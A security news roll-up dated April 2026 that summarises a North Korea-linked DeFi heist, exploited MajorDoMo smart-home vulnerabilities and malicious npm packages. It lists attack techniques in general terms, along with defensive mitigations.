Full Report
You scroll past one incident and see another that feels familiar, like it should have been fixed years ago, but it still works with small changes. Same bugs. Same mistakes. The supply chain is messy. Packages you did not check are stealing data, adding backdoors, and spreading. Attacking the systems behind apps is easier than breaking the apps themselves. The exploits are simple but still work
Analysis Summary
# Morning News Roll-up 2026-04-23
## Overview
This report highlights a series of persistent and recurring security failures across DeFi infrastructure, home automation systems, and the software supply chain. Key incidents include a massive $290M crypto heist linked to North Korea, active exploitation of smart home platform vulnerabilities, and a surge in malicious npm packages.
## Top Stories
### North Korea Linked to $290M KelpDAO Crypto Heist
- Summary: Threat actors identified as TraderTraitor (attributed to North Korea) allegedly compromised LayerZero's infrastructure to drain $290 million from the KelpDAO DeFi project. The attack manipulated RPC infrastructure and utilized a simultaneous DDoS attack to bypass transaction verification guards.
- Source: hxxps://thehackernews[.]com/2026/04/threatsday-bulletin-290m-defi-hack[.]html
### Active RCE Exploitation of MajorDoMo Smart Home Platforms
- Summary: Attackers are actively exploiting two vulnerabilities (CVE-2026-27175 and CVE-2026-27174) in the MajorDoMo home automation platform. Exploits involve command injection and unauthenticated remote code execution used to deploy PHP webshells and Metasploit payloads.
- Source: hxxps://nvd[.]nist[.]gov/vuln/detail/CVE-2026-27175
### Malicious npm Packages Targeting Supply Chains
- Summary: A surge of malicious packages has been detected in the npm registry, designed for credential theft, remote access (RATs), and dependency confusion. Notable packages include ixpresso-core, forge-jsx, and the @fairwords suite, which act as credential worms.
- Source: hxxps://safedep[.]io/malicious-ixpresso-core-npm-rat/
---
# Persistent Supply Chain and Infrastructure Exploitation
The current threat landscape is dominated by "familiar" vulnerabilities—simple bugs and supply chain mistakes that remain effective despite being well-known. Attackers are increasingly targeting the infrastructure behind applications rather than the apps themselves, utilizing automated tools and malicious packages to gain backdoors and steal data.
## Key Points
- **Infrastructure Over Application:** Attackers favor compromising the "systems behind the apps" (such as RPC nodes or dependency trees) rather than breaking the application security layers directly.
- **Supply Chain Fragility:** A significant number of npm packages are being utilized to spread backdoors and steal credentials, exploiting the lack of vetting in third-party dependencies.
- **Smart Home Vulnerability:** Mature automation platforms like MajorDoMo are facing active exploitation through unauthenticated RCE, leading to full system compromise via Meterpreter payloads.
- **DeFi Guard Manipulation:** The KelpDAO heist demonstrates that even decentralized protocols are vulnerable if the underlying infrastructure (RPC nodes) can be poisoned or overwhelmed by DDoS.
## Threat Actors
- **TraderTraitor / Lazarus Group:** State-sponsored threat actors from North Korea; motivated by financial gain to fund state activities. Associated with the $1.5B Bybit hack and the Drift Protocol theft.
- **Various Unattributed Actors:** Utilizing automated scanners to find and exploit MajorDoMo flaws and deploying malicious npm packages for credential harvesting.
## TTPs
- **RPC Poisoning:** Manipulating downstream RPC infrastructure to verify fraudulent transactions.
- **Living-off-the-Land (LotL):** Abusing legitimate system tools to remain stealthy (specifically mentioned regarding macOS).
- **Dependency Confusion:** Registering internal package names on public registries to trick build systems into downloading malicious code.
- **DDoS as a Distraction:** Using volumetric attacks to disable legitimate verification nodes while compromised nodes approve malicious actions.
- **Webshell Deployment:** Using command injection (CVE-2026-27175) to drop PHP-based persistent backdoors.
## Affected Systems
- **DeFi Protocols:** KelpDAO and LayerZero infrastructure.
- **Smart Home Platforms:** MajorDoMo (specifically CVE-2026-27174 and CVE-2026-27175).
- **Software Development Ecosystems:** npm registry users (Node.js environments).
- **Networking Hardware:** NETGEAR DGN2200 routers (CVE-2024-57046).
- **Web Applications:** Systems utilizing Elestio Memos (CVE-2025-22952).
## Mitigations
- **Infrastructure Redundancy:** Avoid "default settings" in cross-chain protocols; ensure RPC nodes are geographically and operationally diverse to prevent quorum poisoning.
- **Dependency Vetting:** Implement automated scanning for npm packages (e.g., using tools like SafeDep) to identify known malicious signatures or unconventional package behavior.
- **Patch Management:** Immediately update MajorDoMo installations and NETGEAR firmware to address known RCE and authentication bypass vulnerabilities.
- **Network Segmentation:** Isolate IoT and smart home automation systems from critical production or personal data networks to limit the impact of a PHP webshell.
## Conclusion
The recurring nature of these exploits suggests that many organizations are failing at security fundamentals. The shift toward infrastructure-level attacks and supply chain poisoning requires a move away from simple perimeter defense toward continuous verification of dependencies and the hardening of the underlying systems that support decentralized and automated applications. Aggressive patching and the use of threat intelligence to identify malicious library patterns are essential.